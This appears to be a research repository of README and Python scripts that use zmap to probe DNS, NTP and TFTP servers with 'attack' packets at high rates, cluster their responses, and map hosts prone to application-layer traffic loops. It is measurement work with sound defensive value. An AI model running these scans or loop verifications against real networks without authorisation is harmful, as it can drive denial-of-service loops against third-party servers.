├── README.md
├── cluster_verify.py
├── discovery_probe.py
├── dns_clustering.py
├── draw_directed_graph.py
├── loop_probe.py
├── ntp_clustering.py
├── proto_attack_profiles.py
├── proxy.py
├── sample_loop_probe_payloads.py
├── tftp_clustering.py
└── verify
    ├── README.md
    └── simple_verify.py

/README.md:
--------------------------------------------------------------------------------

#### Setup:

Postgresql:

    db_name: loop_scan
    user_name: scan

Zmap

Scapy 2.5.0

#### STEP 1: Discovery Probe
1. prepare the scan allowlist (a list of all server IPs running a certain protocol).

   The file shall be named:

       allowlist_<protocol>.txt
       e.g., allowlist_dns.txt

   Example content of the file:

       X.X.X.X/32
       X.X.X.X/32
       ...

   In case you want to scan a subnet, e.g., X.X.X.X/16 or 0.0.0.0/0, remove the following line from discovery_probe.py and loop_probe.py:

       --max-targets=" + str(num_probes) + " \\\n\

2. prepare the blacklist (a list of all server IPs that must not be scanned).

   The file shall be named:

       blacklist.txt

   Example content of the file:

       X.X.X.X/32
       192.168.0.0/16
       ...

3. prepare the config file for zmap.

   The file is named:

       box.config

   Example content of the file:

       interface <interface_name>
       source-ip <source_ip>
       gateway-mac <gateway_mac>

4. run ```python3 discovery_probe.py <protocol> <num_ips_to_probe>``` (num_ips_to_probe=-1 means all)

   e.g., python3 discovery_probe.py ntp -1

5. Upon finishing, a table with all responses collected from the servers will be created, named:

       <protocol>_rsps_<num_probes>_probed_<timestamp>
       e.g., ntp_rsps_10000_probed_1609562355

--------------

The ```discovery_probe.py``` script uses the probes prepared in ```proto_attack_profiles.py```. If you want to add more discovery probes, see the comment in ```proto_attack_profiles.py```.


#### STEP 2: Response Clustering
1. run ```python3 dns/ntp/tftp_clustering.py <scan_table_name> <cluster_table_name> <mapping_dict_file>```

   <scan_table_name>: the table containing the responses collected from servers during the discovery probe (Step 1).
   e.g., ntp_rsps_10000_probed_1609562355

   <cluster_table_name>: the table used to save the clustering result, i.e., the cluster id of each payload.
   e.g., ntp_cluster_discovery

   <mapping_dict_file>: the file used to save the summary of each cluster id.
   e.g., ntp_mapping_dict.pkl


#### STEP 3: Loop Probe
1. run ```python3 sample_loop_probe_payloads.py <protocol> <scan_table_name> <cluster_table_name> <threshold>``` to sample payloads.

   <protocol>: target protocol
   e.g., DNS

   <scan_table_name>: the table containing the responses collected from servers during the discovery probe.
   e.g., ntp_rsps_10000_probed_1609562355

   <cluster_table_name>: the clustering result table from STEP 2.
   e.g., ntp_cluster_discovery

   <threshold>: ignore clusters with fewer than <threshold> distinct responders.
   e.g., 10000

   Upon finishing, a file ```<protocol>_payload.pkl``` containing the sampled payloads will be created.
   The file contains a dict:

       {
           'cluster_type': [payloads1, payloads2],
           'cluster_type2': [payloads1, payloads2],
           ...
       }

   To see the details of the sampled payloads, you can use:

       import pickle
       import pprint
       f = open('<protocol>_payload.pkl', 'rb')
       d = pickle.load(f)
       pprint.pprint(d)


2. run ```python3 loop_probe.py <target_protocol> <payload_protocol> <num_ips_to_probe>``` to perform the loop probe.

   e.g., python3 loop_probe.py ntp ntp -1

   The loop probe script uses the same configuration files as STEP 1.

   Upon finishing, a table containing the scanning result will be created, named:

       <target_protocol>_target_<payload_protocol>_pkts_rsps_<num_probes>_probed_<timestamp>
       e.g., ntp_target_ntp_pkts_rsps_10000_probed_1609562355

   The loop_probe.py script can also explore cross-protocol loops. For example, once you have ```tftp_payload.pkl``` prepared, you can explore TFTP+DNS loops using:

       python3 loop_probe.py dns tftp -1

   This will use the sampled TFTP payloads to scan DNS resolvers.

3. run ```python3 dns/ntp/tftp_clustering.py <loop_probe_table> <cluster_table_name> <mapping_dict_file>```

   <loop_probe_table>: the table generated by the loop probe (Step 3.2).

   <cluster_table_name>: the table used to save the clustering result.

   <mapping_dict_file>: please use the same file as in STEP 2, so known cluster types keep their existing cluster id instead of getting a new one.

4. run ```python3 cluster_verify.py <loop_probe_table> <payload_file>``` to check the clustering effectiveness.

   <loop_probe_table>: the table from Step 3.2
   e.g., ntp_target_ntp_pkts_rsps_10000_probed_1609562355

   <payload_file>: the file containing the sampled payloads, from Step 3.1


#### STEP 4: Loop Graph
1. run ```python3 draw_directed_graph.py <loop_probe_table> <loop_probe_cluster_table> <cycle_file>``` to get the loop graph.

   <loop_probe_table>: the table from Step 3.2

   <loop_probe_cluster_table>: the cluster table from Step 3.3

   <cycle_file>: the file used to save the identified cycles and the vulnerable hosts (see the snippet at the end of this README for a quick way to inspect it).
   The file contains a dict, where each key is an identified cycle:

       {
           '[cluster1, cluster2, cluster1]': [[IP_list_1], [IP_list_2]],
           '[cluster1, cluster1]': [[IP_list_1], [IP_list_2]],
           ...
       }

   The script will also print a table to stdout summarizing the identified cycles and the number of affected IPs.

#### STEP 5: Loop Verify
1. run ```python3 proxy.py <proxy_ip> <loop_probe_table> <payload_file> <cycle_file> <start_port> <target_port>``` to verify the identified loops.

   <proxy_ip>: the IP used by the proxy verifier
   <loop_probe_table>: the table from Step 3.2
   <payload_file>: the file containing the sampled payloads, from Step 3.1
   <cycle_file>: the file containing the identified cycles, from Step 4
   <start_port>: the proxy server uses one port per sampled loop pair; this value defines the first port to be used.
   e.g., 10000
   <target_port>: use 53, 123, or 69 for DNS, NTP, and TFTP respectively.

   Upon finishing, the script will create two files:

       progress.log : summarizes the success rate for each cycle
       udp_proxy_result.log : provides more detail on how many packets are sent within each sampled pair.
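
--------------

To inspect the cycle file written by ```draw_directed_graph.py``` in STEP 4, you can load it the same way as the payload file. This is a minimal sketch, assuming the dict structure shown in STEP 4; ```<cycle_file>``` and the variable names below are illustrative, ```<cycle_file>``` being whatever name you passed as the third argument:

    import pickle
    import pprint

    # load the dict written by draw_directed_graph.py
    f = open('<cycle_file>', 'rb')
    cycle_dict = pickle.load(f)
    f.close()

    # each key is a cycle; each value holds the IP lists of the edges in that cycle
    for cycle, ip_lists in cycle_dict.items():
        print(cycle, 'IPs per edge:', [len(ips) for ips in ip_lists])

    pprint.pprint(list(cycle_dict.keys()))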
187 | 188 | 189 | -------------------------------------------------------------------------------- /cluster_verify.py: -------------------------------------------------------------------------------- 1 | import psycopg2 2 | import tabulate 3 | import pickle 4 | import sys 5 | 6 | db_name = "loop_scan" 7 | db_conn = psycopg2.connect(database=db_name, user="scan") 8 | db_conn.autocommit = True 9 | cursor = db_conn.cursor() 10 | 11 | if len(sys.argv)!=3: 12 | print('python3 cluster_verify.py ') 13 | exit(-1) 14 | 15 | 16 | 17 | scan_2nd_table_name = sys.argv[1] 18 | select_command = "SELECT ARRAY_LENGTH(ARRAY_AGG(rsp_src_ip),1) AS IP_count, count AS num_of_probes, \ 19 | attack_name FROM (SELECT ARRAY_LENGTH(ARRAY_AGG(DISTINCT index),1) AS count, attack_name, rsp_src_ip FROM %s \ 20 | GROUP BY attack_name,rsp_src_ip) AS temp GROUP BY count,attack_name ORDER BY attack_name,count ASC;" % (scan_2nd_table_name) 21 | 22 | cursor.execute(select_command) 23 | data = cursor.fetchall() 24 | 25 | 26 | id_probe_amount_map = {} 27 | f = open(sys.argv[2],'rb') 28 | payload_dict = pickle.load(f) 29 | f.close() 30 | 31 | for key in payload_dict.keys(): 32 | id_probe_amount_map[key] = len(payload_dict[key]) 33 | 34 | 35 | 36 | table_headers = ['attack_name','reply to 0 probe','1 probe','2 probe','3 probe','4 probe','5 probe','reply all fraction','num of probes'] 37 | readable_table = [] 38 | 39 | 40 | amount_dict ={} 41 | for data_item in data: 42 | attack_name = str(data_item[2]).strip() 43 | if attack_name in amount_dict: 44 | amount_dict[attack_name][str(data_item[1]).strip()] = int(data_item[0]) 45 | else: 46 | amount_dict[attack_name]={} 47 | amount_dict[attack_name][str(data_item[1]).strip()] = int(data_item[0]) 48 | 49 | for attack_name in amount_dict.keys(): 50 | temp_list = [attack_name,'?'] 51 | try: 52 | amount_1 = amount_dict[attack_name][str(1)] 53 | temp_list.append(amount_1) 54 | except: 55 | if id_probe_amount_map[attack_name]>=1: 56 | amount_1 = '0' 57 | else: 58 | amount_1 = '-' 59 | temp_list.append(amount_1) 60 | try: 61 | amount_2 = amount_dict[attack_name][str(2)] 62 | temp_list.append(amount_2) 63 | except: 64 | if id_probe_amount_map[attack_name]>=2: 65 | amount_2 = '0' 66 | else: 67 | amount_2 = '-' 68 | temp_list.append(amount_2) 69 | try: 70 | amount_3 = amount_dict[attack_name][str(3)] 71 | temp_list.append(amount_3) 72 | except: 73 | if id_probe_amount_map[attack_name]>=3: 74 | amount_3 = '0' 75 | else: 76 | amount_3 = '-' 77 | temp_list.append(amount_3) 78 | try: 79 | amount_4 = amount_dict[attack_name][str(4)] 80 | temp_list.append(amount_4) 81 | except: 82 | if id_probe_amount_map[attack_name]>=4: 83 | amount_4 = '0' 84 | else: 85 | amount_4 = '-' 86 | temp_list.append(amount_4) 87 | try: 88 | amount_5 = amount_dict[attack_name][str(5)] 89 | temp_list.append(amount_5) 90 | except: 91 | if id_probe_amount_map[attack_name]>=5: 92 | amount_5 = '0' 93 | else: 94 | amount_5 = '-' 95 | temp_list.append(amount_5) 96 | try: 97 | s = 0 98 | s = s + amount_dict[attack_name][str(1)] 99 | s = s + amount_dict[attack_name][str(2)] 100 | s = s + amount_dict[attack_name][str(3)] 101 | s = s + amount_dict[attack_name][str(4)] 102 | s = s + amount_dict[attack_name][str(5)] 103 | except: 104 | pass 105 | 106 | try: 107 | s = round(amount_dict[attack_name][str(id_probe_amount_map[attack_name])]/s*1.0,1) 108 | temp_list.append(s) 109 | except: 110 | temp_list.append('?') 111 | pass 112 | 113 | 114 | temp_list.append(id_probe_amount_map[attack_name]) 115 | readable_table.append(temp_list) 116 | 117 
| 118 | print(tabulate.tabulate(readable_table,headers = table_headers)) 119 | -------------------------------------------------------------------------------- /discovery_probe.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import pandas as pd 3 | import proto_attack_profiles 4 | import psycopg2 5 | import random 6 | import string 7 | from subprocess import call 8 | import time 9 | import os 10 | import sys 11 | 12 | DEBUG = True 13 | logging.basicConfig(level=logging.DEBUG, format="[%(asctime)s] %(message)s") 14 | 15 | 16 | db_name = "loop_scan" 17 | db_conn = psycopg2.connect(database=db_name, user="scan") 18 | db_conn.autocommit = True 19 | db_cursor = db_conn.cursor() 20 | 21 | proto = sys.argv[1].lower() 22 | 23 | 24 | proto_profile = proto_attack_profiles.proto_to_profile[proto] 25 | 26 | trunc_timestamp = str(time.time()).rpartition(".")[0] 27 | num_probes = int(sys.argv[2]) 28 | if DEBUG: logging.debug("START: counting lines in allowlist.") 29 | with open(r"allowlist_" + proto + ".txt", 'r') as fp: 30 | num_allowed_ips = len(fp.readlines()) 31 | if (num_probes < 0) or (num_probes > num_allowed_ips): 32 | num_probes = num_allowed_ips 33 | if DEBUG: logging.debug("FINISHED: counting lines in allowlist.\n") 34 | 35 | responses_storage_name = proto + "_rsps_" + str(num_probes) + "_probed_" + trunc_timestamp 36 | 37 | create_new_table_sql = "CREATE TABLE IF NOT EXISTS " + responses_storage_name + "(saddr inet NOT NULL,\ 38 | data text NOT NULL, attack_name text NOT NULL);" 39 | if DEBUG: logging.debug("START: creating sql responses table.") 40 | db_cursor.execute(create_new_table_sql) 41 | if DEBUG: logging.debug("FINISHED: creating sql responses table.\n") 42 | 43 | 44 | num_allowlists = 1 45 | 46 | for i in range(num_allowlists): 47 | 48 | allowlist_path = "allowlist_" + proto + ".txt" 49 | attacks = proto_profile.attack_name_to_pkt 50 | sending_port = 50000 51 | 52 | # the server might deploy source port filtering -> to filter out well-known port number 53 | # if you want to get rid of these cases, use the following code 54 | # proto_to_port = { "dns" : 53, "ntp" : 123, "tftp" : 69 } 55 | # target_port = proto_to_port[proto] 56 | # sending_port = proto_to_port[proto] 57 | 58 | 59 | # one could use the following output filter: 60 | # --output-fields=\"saddr,sport,dport,data\" \\\n\ 61 | # --output-filter=\"sport=" + str(proto_to_port[proto]) + " && dport=" + str(sending_port) + " && success=1 && repeat=0\" \\\n\ 62 | # In case some UDP server (e.g., TFTP server) will use random port to send response. 
63 | 64 | 65 | for attack_name in attacks: 66 | if DEBUG: logging.debug("---------- PROBE: " + attack_name + " ----------\n") 67 | sending_port += 1 68 | scan_script_str = "#!/usr/bin/env bash\n\ 69 | WHITELIST=" + allowlist_path + "\n\ 70 | BLACKLIST=blacklist.txt\n\ 71 | box_config=box.config\n\ 72 | responses_dir_path=rsps/" + responses_storage_name + "\n\ 73 | mkdir -p $responses_dir_path\n\ 74 | set -o pipefail &&\n\ 75 | /usr/local/sbin/zmap \\\n\ 76 | --config=$box_config \\\n\ 77 | --target-port=" + str(proto_profile.port) + " \\\n\ 78 | --source-port=" + str(sending_port) + " \\\n\ 79 | --allowlist-file=${WHITELIST} \\\n\ 80 | --blocklist-file=${BLACKLIST} \\\n\ 81 | --rate=100000 \\\n\ 82 | --sender-threads=1 \\\n\ 83 | --max-targets=" + str(num_probes) + " \\\n\ 84 | --cooldown-time=10 \\\n\ 85 | --seed=85 \\\n\ 86 | --probes=1 \\\n\ 87 | --probe-module=udp \\\n\ 88 | --probe-args=" + proto_profile.attack_name_to_format[attack_name] + ":" + proto_profile.attack_name_to_pkt[attack_name] + " \\\n\ 89 | --output-module=csv \\\n\ 90 | --output-fields=\"saddr,data\" \\\n\ 91 | --output-filter=\"\" \\\n\ 92 | --verbosity=0 \\\n\ 93 | --quiet \\\n\ 94 | --disable-syslog \\\n\ 95 | --ignore-blocklist-errors \\\n\ 96 | > ${responses_dir_path}/" + attack_name + "_responses.csv" 97 | 98 | if DEBUG: logging.debug("START: write zmap script to .sh file.") 99 | scan_script_f = open("zmap_scan.sh", "w") 100 | scan_script_f.write(scan_script_str) 101 | scan_script_f.close() 102 | if DEBUG: logging.debug("FINISHED: write zmap script to .sh file.\n") 103 | 104 | 105 | if DEBUG: logging.debug("START: call zmap on a single attack packet.") 106 | call(['/bin/bash', 'zmap_scan.sh']) 107 | if DEBUG: logging.debug("FINISHED: call zmap on a single attack packet.\n") 108 | 109 | time.sleep(5) 110 | 111 | # ---------------------------- SAVE RESPONSES ---------------------------------- 112 | 113 | # Label: each row/response labeled with attack name. 114 | if DEBUG: logging.debug("START: read csv into pandas dataframe.") 115 | csv_path = os.getcwd() + "/rsps/" + responses_storage_name + "/" + attack_name + "_responses.csv" 116 | zmap_df = pd.read_csv(csv_path) 117 | if DEBUG: logging.debug("FINISHED: read csv into pandas dataframe.") 118 | zmap_df['attack_name'] = attack_name 119 | # zmap_df = zmap_df.drop(['sport','dport'],axis=1) 120 | if DEBUG: logging.debug("FINISHED: add attack column to csv.") 121 | zmap_df.to_csv(csv_path, index=False) 122 | if DEBUG: logging.debug("FINISHED: convert dataframe back to csv.\n") 123 | 124 | # Transfer: ZMap csv output file -> postgresql table 125 | transfer_sql = "COPY " + responses_storage_name + "(saddr, data, attack_name) FROM '" + csv_path + "' DELIMITER ',' CSV HEADER WHERE data IS NOT NULL;" 126 | if DEBUG: logging.debug("START: copy csv to database.") 127 | db_cursor.execute(transfer_sql) 128 | if DEBUG: logging.debug("FINISHED: copy csv to database.\n") 129 | 130 | 131 | 132 | # All ZMap responses were transferred into the postgresql table, so it is now 133 | # safe to rename the columns to more descriptive names. 
134 | if DEBUG: logging.debug("START: rename two columns in database.") 135 | rename_col1_sql = "ALTER TABLE " + responses_storage_name + " RENAME saddr TO rsp_src_ip;" 136 | db_cursor.execute(rename_col1_sql) 137 | 138 | rename_col2_sql = "ALTER TABLE " + responses_storage_name + " RENAME data TO rsp_payload;" 139 | db_cursor.execute(rename_col2_sql) 140 | if DEBUG: logging.debug("FINISHED: rename two columns in database.\n") 141 | 142 | 143 | 144 | if DEBUG: logging.debug("START: close database cursor and connection.") 145 | db_cursor.close() 146 | db_conn.close() 147 | if DEBUG: logging.debug("FINISHED: close database cursor and connection.\n") 148 | 149 | print("Probe responses were stored using Postgresql.") 150 | print("\tdatabase name: " + db_name) 151 | print("\ttable name: " + responses_storage_name) -------------------------------------------------------------------------------- /dns_clustering.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import psycopg2 3 | import pickle 4 | import psycopg2.extras 5 | 6 | # Remind to replace the domain name in line #175 7 | 8 | def DNS_classifier(payload): 9 | try: 10 | dns_pac = DNS(bytes.fromhex(payload)) 11 | status_code = '' 12 | # ------------- QR ----------------- 13 | status_bit = '' 14 | try: 15 | qr = dns_pac.qr 16 | status_bit = hex(qr)[2] 17 | except: 18 | status_bit = '-' 19 | 20 | status_code = status_code + status_bit 21 | 22 | # ------------ OPCODE ------------ 23 | status_bit = '' 24 | try: 25 | opcode = dns_pac.opcode 26 | status_bit = hex(opcode)[2] 27 | except: 28 | status_bit = '-' 29 | status_code = status_code + status_bit 30 | 31 | # ----------- AA ------------ 32 | status_bit = '' 33 | try: 34 | aa = dns_pac.aa 35 | status_bit = hex(aa)[2] 36 | except: 37 | status_bit = '-' 38 | status_code = status_code + status_bit 39 | 40 | # ----------- TC ------------ 41 | status_bit = '' 42 | try: 43 | tc = dns_pac.tc 44 | status_bit = hex(tc)[2] 45 | except: 46 | status_bit = '-' 47 | status_code = status_code + status_bit 48 | 49 | 50 | # ----------- RD ------------ 51 | status_bit = '' 52 | try: 53 | rd = dns_pac.rd 54 | status_bit = hex(rd)[2] 55 | except: 56 | status_bit = '-' 57 | status_code = status_code + status_bit 58 | 59 | # ----------- RA ------------ 60 | status_bit = '' 61 | try: 62 | ra = dns_pac.ra 63 | status_bit = hex(ra)[2] 64 | except: 65 | status_bit = '-' 66 | status_code = status_code + status_bit 67 | 68 | 69 | # ----------- z ------------ 70 | status_bit = '' 71 | try: 72 | z = dns_pac.z 73 | status_bit = hex(z)[2] 74 | except: 75 | status_bit = '-' 76 | status_code = status_code + status_bit 77 | 78 | # ----------- ad ------------ 79 | status_bit = '' 80 | try: 81 | ad = dns_pac.ad 82 | status_bit = hex(ad)[2] 83 | except: 84 | status_bit = '-' 85 | status_code = status_code + status_bit 86 | 87 | # ----------- cd ------------ 88 | status_bit = '' 89 | try: 90 | cd = dns_pac.cd 91 | status_bit = hex(cd)[2] 92 | except: 93 | status_bit = '-' 94 | status_code = status_code + status_bit 95 | 96 | # ----------- rcode ------------ 97 | status_bit = '' 98 | try: 99 | rcode = dns_pac.rcode 100 | status_bit = hex(rcode)[2] 101 | except: 102 | status_bit = '-' 103 | status_code = status_code + status_bit 104 | 105 | # ----------- qdcount --------- 106 | status_bit = '' 107 | try: 108 | qdcount = dns_pac.qdcount 109 | if qdcount <=1: 110 | status_bit = '000'+hex(qdcount)[2] 111 | elif qdcount<=256: 112 | status_bit = '0100' 113 | elif 
qdcount<=8192: 114 | status_bit = '2000' 115 | elif qdcount<=65536: 116 | status_bit = 'ffff' 117 | except: 118 | status_bit = '----' 119 | status_code = status_code + status_bit 120 | 121 | # ----------- ancount --------- 122 | status_bit = '' 123 | try: 124 | ancount = dns_pac.ancount 125 | if ancount <=1: 126 | status_bit = '000'+hex(ancount)[2] 127 | elif ancount<=256: 128 | status_bit = '0100' 129 | elif ancount<=8192: 130 | status_bit = '2000' 131 | elif ancount<=65536: 132 | status_bit = 'ffff' 133 | except: 134 | status_bit = '----' 135 | status_code = status_code + status_bit 136 | 137 | # ----------- nscount --------- 138 | status_bit = '' 139 | try: 140 | nscount = dns_pac.nscount 141 | if nscount <=1: 142 | status_bit = '000'+hex(nscount)[2] 143 | elif nscount<=256: 144 | status_bit = '0100' 145 | elif nscount<=8192: 146 | status_bit = '2000' 147 | elif nscount<=65536: 148 | status_bit = 'ffff' 149 | except: 150 | status_bit = '----' 151 | status_code = status_code + status_bit 152 | 153 | # ----------- arcount --------- 154 | status_bit = '' 155 | try: 156 | arcount = dns_pac.arcount 157 | if arcount <=1: 158 | status_bit = '000'+hex(arcount)[2] 159 | elif arcount<=256: 160 | status_bit = '0100' 161 | elif arcount<=8192: 162 | status_bit = '2000' 163 | elif arcount<=65536: 164 | status_bit = 'ffff' 165 | except: 166 | status_bit = '----' 167 | status_code = status_code + status_bit 168 | 169 | # ------------ qname------------------ 170 | status_bit='' 171 | try: 172 | qname = dns_pac.qd.qname 173 | if qname==b'.': 174 | status_bit = 'isdot' 175 | elif b'our domain' in qname: 176 | status_bit = 'okdom' 177 | else: 178 | status_bit = 'nodom' 179 | except: 180 | status_bit = '-----' 181 | status_code = status_code + status_bit 182 | 183 | # ---------- QTYPE -------------- 184 | status_bit = '' 185 | try: 186 | qtype = dns_pac.qd.qtype 187 | hex_str = hex(qtype) 188 | hex_str = hex_str[2:len(hex_str)] 189 | for i in range(0,4-len(hex_str)): 190 | hex_str = '0'+hex_str 191 | status_bit = hex_str 192 | except: 193 | status_bit = '----' 194 | status_code = status_code+status_bit 195 | 196 | # ---------- QCLASS -------------- 197 | status_bit = '' 198 | try: 199 | qclass = dns_pac.qd.qclass 200 | hex_str = hex(qclass) 201 | hex_str = hex_str[2:len(hex_str)] 202 | for i in range(0,4-len(hex_str)): 203 | hex_str = '0'+hex_str 204 | status_bit = hex_str 205 | except: 206 | status_bit = '----' 207 | status_code = status_code+status_bit 208 | 209 | 210 | # ---------- atype -------------- 211 | status_bit = '' 212 | try: 213 | atype = dns_pac.an.type 214 | hex_str = hex(atype) 215 | hex_str = hex_str[2:len(hex_str)] 216 | for i in range(0,4-len(hex_str)): 217 | hex_str = '0'+hex_str 218 | status_bit = hex_str 219 | except: 220 | status_bit = '----' 221 | status_code = status_code+status_bit 222 | 223 | # ---------- aclass -------------- 224 | status_bit = '' 225 | try: 226 | aclass = dns_pac.an.rclass 227 | hex_str = hex(aclass) 228 | hex_str = hex_str[2:len(hex_str)] 229 | for i in range(0,4-len(hex_str)): 230 | hex_str = '0'+hex_str 231 | status_bit = hex_str 232 | except: 233 | status_bit = '----' 234 | status_code = status_code+status_bit 235 | 236 | 237 | # # --------- rdlen ------------------- 238 | # status_bit = '' 239 | # try: 240 | # rdlen = dns_pac.an.rdlen 241 | # if rdlen <=32: 242 | # status_bit = '0020' 243 | # # elif arcount<=256: 244 | # # status_bit = '0100' 245 | # # elif arcount<=8192: 246 | # # status_bit = '2000' 247 | # # elif arcount<=65536: 248 | # # status_bit = 
'ffff' 249 | # except: 250 | # status_bit = '----' 251 | # status_code = status_code + status_bit 252 | 253 | return status_code 254 | except Exception as e: 255 | status_code = str(e) + '|' 256 | status_bit = '' 257 | 258 | if len(payload)<=2: 259 | status_bit = 'os' 260 | status_code = status_code + status_bit 261 | return status_code 262 | 263 | payload_bits_str = '' 264 | for hex_str in payload: 265 | payload_bits_str = payload_bits_str + bin(int(hex_str,16))[2:].zfill(4) 266 | 267 | payload_bits_str_len = len(payload_bits_str) 268 | 269 | # QR 270 | status_bit = '' 271 | if payload_bits_str_len>=17: 272 | qr = payload_bits_str[16] 273 | status_bit = qr 274 | else: 275 | status_bit = '-' 276 | status_code = status_code + status_bit 277 | return status_code 278 | 279 | status_code = status_code + status_bit 280 | 281 | # OPCODE 282 | status_bit = '' 283 | if payload_bits_str_len>=21: 284 | opcode = payload_bits_str[17:21] 285 | status_bit = hex(int(opcode,2))[2:] 286 | else: 287 | status_bit = '-' 288 | status_code = status_code + status_bit 289 | return status_code 290 | 291 | status_code = status_code + status_bit 292 | 293 | 294 | # AA 295 | status_bit = '' 296 | if payload_bits_str_len>=22: 297 | aa = payload_bits_str[21] 298 | status_bit = aa 299 | else: 300 | status_bit = '-' 301 | status_code = status_code + status_bit 302 | return status_code 303 | 304 | status_code = status_code + status_bit 305 | 306 | # TC 307 | status_bit = '' 308 | if payload_bits_str_len>=23: 309 | tc = payload_bits_str[22] 310 | status_bit = tc 311 | else: 312 | status_bit = '-' 313 | status_code = status_code + status_bit 314 | return status_code 315 | 316 | status_code = status_code + status_bit 317 | 318 | # RD 319 | status_bit = '' 320 | if payload_bits_str_len>=24: 321 | rd = payload_bits_str[23] 322 | status_bit = rd 323 | else: 324 | status_bit = '-' 325 | status_code = status_code + status_bit 326 | return status_code 327 | 328 | status_code = status_code + status_bit 329 | 330 | # RA 331 | status_bit = '' 332 | if payload_bits_str_len>=25: 333 | ra = payload_bits_str[24] 334 | status_bit = ra 335 | else: 336 | status_bit = '-' 337 | status_code = status_code + status_bit 338 | return status_code 339 | 340 | status_code = status_code + status_bit 341 | 342 | 343 | # z 344 | status_bit = '' 345 | if payload_bits_str_len>=26: 346 | z = payload_bits_str[25] 347 | status_bit = z 348 | else: 349 | status_bit = '-' 350 | status_code = status_code + status_bit 351 | return status_code 352 | 353 | status_code = status_code + status_bit 354 | 355 | 356 | # ad 357 | status_bit = '' 358 | if payload_bits_str_len>=27: 359 | ad = payload_bits_str[26] 360 | status_bit = ad 361 | else: 362 | status_bit = '-' 363 | status_code = status_code + status_bit 364 | return status_code 365 | 366 | status_code = status_code + status_bit 367 | 368 | 369 | # cd 370 | status_bit = '' 371 | if payload_bits_str_len>=28: 372 | cd = payload_bits_str[27] 373 | status_bit = cd 374 | else: 375 | status_bit = '-' 376 | status_code = status_code + status_bit 377 | return status_code 378 | 379 | status_code = status_code + status_bit 380 | 381 | 382 | # rcode 383 | status_bit = '' 384 | if payload_bits_str_len>=32: 385 | rcode = payload_bits_str[28:32] 386 | status_bit = hex(int(rcode,2))[2:] 387 | else: 388 | status_bit = '-' 389 | status_code = status_code + status_bit 390 | return status_code 391 | 392 | status_code = status_code + status_bit 393 | 394 | 395 | # qdcount 396 | status_bit = '' 397 | if payload_bits_str_len>=48: 398 | 
qdcount = payload_bits_str[32:48] 399 | qdcount = int(qdcount,2) 400 | if qdcount <=1: 401 | status_bit = '000'+hex(qdcount)[2] 402 | elif qdcount<=256: 403 | status_bit = '0100' 404 | elif qdcount<=8192: 405 | status_bit = '2000' 406 | elif qdcount<=65536: 407 | status_bit = 'ffff' 408 | else: 409 | status_bit = '----' 410 | status_code = status_code + status_bit 411 | return status_code 412 | 413 | status_code = status_code + status_bit 414 | 415 | # ancount 416 | status_bit = '' 417 | if payload_bits_str_len>=64: 418 | ancount = payload_bits_str[48:64] 419 | ancount = int(ancount,2) 420 | if ancount <=1: 421 | status_bit = '000'+hex(ancount)[2] 422 | elif ancount<=256: 423 | status_bit = '0100' 424 | elif ancount<=8192: 425 | status_bit = '2000' 426 | elif ancount<=65536: 427 | status_bit = 'ffff' 428 | else: 429 | status_bit = '----' 430 | status_code = status_code + status_bit 431 | return status_code 432 | 433 | status_code = status_code + status_bit 434 | 435 | 436 | # nscount 437 | status_bit = '' 438 | if payload_bits_str_len>=80: 439 | nscount = payload_bits_str[64:80] 440 | nscount = int(nscount,2) 441 | if nscount <=1: 442 | status_bit = '000'+hex(nscount)[2] 443 | elif nscount<=256: 444 | status_bit = '0100' 445 | elif nscount<=8192: 446 | status_bit = '2000' 447 | elif nscount<=65536: 448 | status_bit = 'ffff' 449 | else: 450 | status_bit = '----' 451 | status_code = status_code + status_bit 452 | return status_code 453 | 454 | status_code = status_code + status_bit 455 | 456 | 457 | # arcount 458 | status_bit = '' 459 | if payload_bits_str_len>=96: 460 | arcount = payload_bits_str[80:96] 461 | arcount = int(arcount,2) 462 | if arcount <=1: 463 | status_bit = '000'+hex(arcount)[2] 464 | elif arcount<=256: 465 | status_bit = '0100' 466 | elif arcount<=8192: 467 | status_bit = '2000' 468 | elif arcount<=65536: 469 | status_bit = 'ffff' 470 | else: 471 | status_bit = '----' 472 | status_code = status_code + status_bit 473 | return status_code 474 | 475 | status_code = status_code + status_bit 476 | 477 | status_bit = '' 478 | rest_payload_length = len(payload_bits_str)-96 479 | if rest_payload_length==0: 480 | status_bit = '0000' 481 | elif rest_payload_length<=128: 482 | status_bit = '0080' 483 | elif rest_payload_length<=1024: 484 | status_bit = '0400' 485 | else: 486 | status_bit = 'ffff' 487 | status_code = status_code + status_bit 488 | return status_code 489 | 490 | 491 | def do_cluster(raw_data_table_name,output_mapping_table_name,cluster_payload_pattern_mapping): 492 | db_name = "loop_scan" 493 | db_conn = psycopg2.connect(database=db_name, user="scan") 494 | db_conn.autocommit = True 495 | cursor = db_conn.cursor() 496 | 497 | sql_get_length = "SELECT COUNT(*) FROM %s;" % (raw_data_table_name) 498 | cursor.execute(sql_get_length) 499 | max_item_count = cursor.fetchall()[0][0] 500 | 501 | 502 | status_dict = {} 503 | total_cluster = 0 504 | try: 505 | dict_file = open(cluster_payload_pattern_mapping,'rb') 506 | status_dict = pickle.load(dict_file) 507 | total_clusters = len(status_dict) 508 | dict_file.close() 509 | except: 510 | pass 511 | 512 | offset = 0 513 | step_size = 10000 514 | progress_count = 0 515 | 516 | try: 517 | drop_table = "DROP TABLE %s;" % (output_mapping_table_name) 518 | cursor.execute(drop_table) 519 | except: 520 | pass 521 | 522 | create_table = "CREATE TABLE %s (type_id INT,\ 523 | payload TEXT PRIMARY KEY);" % (output_mapping_table_name) 524 | cursor.execute(create_table) 525 | 526 | 527 | insert_command = "INSERT INTO " + 
output_mapping_table_name + " VALUES %s;" 528 | payload_list = set() 529 | while(True): 530 | if offset > max_item_count: 531 | break 532 | select_command = "select DISTINCT rsp_payload from %s;" % (raw_data_table_name) 533 | cursor.execute(select_command) 534 | all_data = cursor.fetchall() 535 | 536 | 537 | update_list = [] 538 | for data in all_data: 539 | progress_count = progress_count + 1 540 | payload_data = data[0].strip() 541 | total_clusters = len(status_dict.keys()) + 1 542 | status_code = DNS_classifier(payload_data) 543 | if len(payload_data) > 2500: 544 | continue 545 | if not status_code in status_dict: 546 | status_dict[status_code] = total_clusters 547 | 548 | 549 | if not payload_data in payload_list: 550 | update_list.append((status_dict[status_code],payload_data,)) 551 | payload_list.add(payload_data) 552 | 553 | temp = psycopg2.extras.execute_values(cursor,insert_command,update_list) 554 | 555 | 556 | offset = offset + step_size 557 | break 558 | 559 | 560 | with open(cluster_payload_pattern_mapping,'wb') as f: 561 | pickle.dump(status_dict,f) 562 | f.close() 563 | 564 | 565 | 